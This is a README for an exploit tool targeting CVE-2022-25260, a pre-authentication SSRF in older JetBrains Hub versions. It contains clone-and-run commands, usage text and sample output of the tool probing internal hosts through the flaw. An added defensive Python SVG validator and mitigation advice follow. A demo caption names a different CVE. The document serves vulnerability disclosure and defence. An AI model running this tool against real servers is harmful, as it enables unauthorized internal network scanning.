CVE-2022-25260 JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF)

Overview

CVE-2022-25260

JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF)

Requirements

  • JetBrains Hub <2021.1.14276
  • JetBrains Hub before 2021.1.14276 was vulnerable to improper access control (CVE-2022-34894), which allows an attacker to create untrusted services without authentication even if the guest user is disabled. This makes it possible to exploit the vulnerability without any other requirements (normally an attacker would need to be at least authenticated)

Usage

Install & run:

$ git clone https://github.com/yuriisanin/CVE-2022-25260
$ cd CVE-2022-25260/
$ python3 exploit.py -h

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
usage: exploit.py [-h] -hub_url HUB_URL -email EMAIL [-internal_urls_file INTERNAL_URLS_FILE] [-internal_url INTERNAL_URL]

optional arguments:
  -h, --help            show this help message and exit
  -hub_url HUB_URL      Target Hub instance
  -email EMAIL          Email address of any user in the system
  -internal_urls_file INTERNAL_URLS_FILE
                        Path to internal service URLs file
  -internal_url INTERNAL_URL
                        Internal service URL
  

Usage:

$ python3 exploit.py -hub_url http://localhost:8080 -email hello@0d.tf -internal_urls_file ./assets/payloads/urls.txt

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
[INFO] - staring scanning for 14 urls.
[INFO] - trying to create Hub service.
[INFO] - Hub service create, serviceId: '02cc6043-1469-4a8e-9a74-b003e721620c'.
[INFO] - trying to request: 'http://127.0.0.1:8080'.
[INFO] - OK. Host 'http://127.0.0.1:8080' is running HTTP service (XML-like response) [FOUND]. Message: 'Attribute name "ng-strict-di" associated with an element type "html" must be followed by the ' = ' character.'.
[INFO] - trying to request: 'http://127.0.0.1:8081'.
[INFO] - OK. Host 'http://127.0.0.1:8081' is DOWN.
[INFO] - trying to request: 'http://google.com'.
[INFO] - OK. Host 'http://google.com' is running HTTP service (presumably XML-like response) [FOUND]. Message: 'The markup in the document preceding the root element must be well-formed.'.

DEMO:

[demo image: CVE-2022-24342 Demo]

How does it work?

The vulnerability was possible due to the use of Apache Batik with default settings for rasterizing user-supplied SVG icons: the rasterizer resolves and fetches any external resource the SVG references, so the server makes the request on the attacker's behalf. You can find more information about exploiting server-side SVG rasterization HERE.
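As an added defensive illustration (this is not code from the CVE-2022-25260 repository and not Hub's or Batik's API), the following Python pre-check rejects user-supplied SVG icons carrying constructs that a server-side rasterizer would resolve outside the document: `href`/`xlink:href` values that are not fragments or inline image data, DOCTYPE/ENTITY declarations, `<script>` elements, and CSS `url()`/`@import`. The function names, the sample icons and the `internal-service.example` host are constructed for the example.

```python
"""Defensive pre-check for user-supplied SVG icons (added example, not part of
the CVE-2022-25260 repository). It flags constructs that make a server-side
rasterizer such as Apache Batik fetch something outside the document, which is
the mechanism the README describes. Names and sample inputs are constructed."""
import re
import xml.etree.ElementTree as ET

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
URL_ATTRS = ("href", XLINK_HREF)  # attributes a rasterizer resolves and fetches

# References that stay inside the document: fragments (#id) and inline raster data.
_SAFE_REF = re.compile(r"^\s*(#|data:image/(png|jpeg|gif);base64,)", re.I)
_CSS_FETCH = re.compile(r"url\s*\(|@import", re.I)
_DTD = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.I)


def _local(tag: str) -> str:
    """Strip the XML namespace prefix ({uri}name -> name) from a tag."""
    return tag.rsplit("}", 1)[-1]


def svg_external_refs(svg_text: str) -> list:
    """Return the reasons an SVG would cause an outbound fetch (empty list = none found)."""
    findings = []
    # Checked on the raw text: ElementTree does not expose DTD internals.
    if _DTD.search(svg_text):
        findings.append("DOCTYPE/ENTITY declaration (external entity or DTD fetch)")
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        findings.append(f"not well-formed XML: {exc}")
        return findings
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        name = _local(el.tag)
        if name == "script":
            findings.append("<script> element (script execution during rendering)")
        for attr in URL_ATTRS:
            value = el.get(attr)
            if value is not None and not _SAFE_REF.match(value):
                short = _local(attr)
                findings.append(f"<{name}> {short}={value!r} points outside the document")
        # CSS can also pull resources: <style> bodies and inline style attributes.
        css = (el.text or "") if name == "style" else ""
        css += el.get("style", "")
        if _CSS_FETCH.search(css):
            findings.append(f"<{name}> CSS contains url()/@import")
    return findings


def is_safe_svg(svg_text: str) -> bool:
    """Accept only SVGs with no findings; any external reference rejects the icon."""
    return not svg_external_refs(svg_text)


# Constructed sample icons (not payloads from the repository).
CLEAN_ICON = ('<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">'
              '<circle id="c" cx="8" cy="8" r="6" fill="#3c3"/><use href="#c"/></svg>')
REMOTE_IMAGE_ICON = ('<svg xmlns="http://www.w3.org/2000/svg" '
                     'xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 16 16">'
                     '<image xlink:href="http://internal-service.example:8080/" '
                     'width="16" height="16"/></svg>')
EXTERNAL_DTD_ICON = ('<!DOCTYPE svg SYSTEM "http://internal-service.example/icon.dtd">'
                     '<svg xmlns="http://www.w3.org/2000/svg"/>')

if __name__ == "__main__":
    for label, doc in [("clean", CLEAN_ICON), ("remote image", REMOTE_IMAGE_ICON),
                       ("external DTD", EXTERNAL_DTD_ICON)]:
        verdict = "ACCEPT" if is_safe_svg(doc) else "REJECT"
        print(f"{label}: {verdict} {svg_external_refs(doc)}")
```

This check is defence in depth for the upload path; the primary control is the rasterizer's own resource policy (Batik lets the user agent restrict external resource and script loading, which the default settings the README mentions do not do), plus egress filtering so a rendering host cannot reach internal services at all.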

Support

You can follow me on Twitter, GitHub or YouTube.

Owner: Yurii Sanin (Security Engineer)